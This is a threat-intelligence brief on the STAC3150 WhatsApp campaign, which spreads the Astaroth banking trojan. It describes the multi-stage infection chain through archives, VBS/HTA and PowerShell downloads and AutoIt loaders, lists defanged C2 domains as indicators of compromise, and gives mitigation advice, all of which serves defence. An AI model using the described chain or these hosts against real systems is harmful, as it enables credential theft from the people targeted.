WhatsApp STAC3150 Campaign Deploys Astaroth Banking Trojan
Category:Threat Actors & Campaigns
A persistent malware distribution campaign tracked as STAC3150 is targeting WhatsApp users—primarily in Brazil—using multi-stage infection flows that ultimately deploy the Astaroth (Guildma) banking trojan. Sophos reports that attackers initiate the attack through WhatsApp “View Once” messages containing malicious archive files. Once opened, the embedded VBS or HTA scripts execute PowerShell commands that retrieve secondary payloads, leveraging MITRE ATT&CK techniques like T1059.001 (PowerShell), T1105 (Ingress Tool Transfer), and T1566.002 (Phishing via messaging platforms). The second-stage payloads include scripts that harvest WhatsApp contacts, session tokens, and browser data. Later phases of the campaign introduce MSI installers that deploy the Astaroth trojan via disguised AutoIt loaders. Astaroth is known for stealthy credential theft, dynamic C2 communication, and evasion tactics that disable security tooling. Researchers observed the malware communicating with attacker-controlled C2 domains such as manoelimoveiscaioba[.]com and varegjopeaks[.]com. The campaign demonstrates significant evolution, transitioning from IMAP-based payload delivery to HTTP requests executed via PowerShell’s Invoke-WebRequest. The business impact is substantial for organizations with employees who use personal devices for communication or work. Astaroth can capture email credentials, browser session data, corporate MFA prompts, and stored secrets, enabling attackers to compromise enterprise email, VPNs, and cloud accounts. Compliance exposure arises from unauthorized access to regulated data and account hijacking events enabled by compromised credentials. Mitigation requires organizations to educate employees about archive-based phishing lures sent through messaging apps, enforce mobile endpoint protection policies, and block IoCs associated with the STAC3150 campaign. Security teams should monitor for PowerShell-based download activity, implement application control restrictions for script interpreters, and deploy behavioral EDR detections tuned for Astaroth’s workflow.
CORTEX Protocol Intelligence Assessment
Business Impact: Compromised devices can leak credentials and session tokens that grant attackers access to enterprise systems. Astaroth’s stealthy profile increases the risk of long-term unauthorized access. Technical Context: The campaign leverages multi-stage scripting mapped to MITRE T1059.001 and T1105, culminating in Astaroth deployment via AutoIt-based loaders.
Strategic Intelligence Guidance
- Block malicious WhatsApp-related IoCs and domains associated with STAC3150.
- Restrict PowerShell execution and implement application control for script engines.
- Deploy mobile EDR tools capable of detecting WhatsApp session hijacking.
- Educate users on messaging-based phishing and discouraged archive file execution.
Vendors
Threats
Targets
Intelligence Source: WhatsApp STAC3150 Campaign Deploys Astaroth Banking Trojan | Nov 21, 2025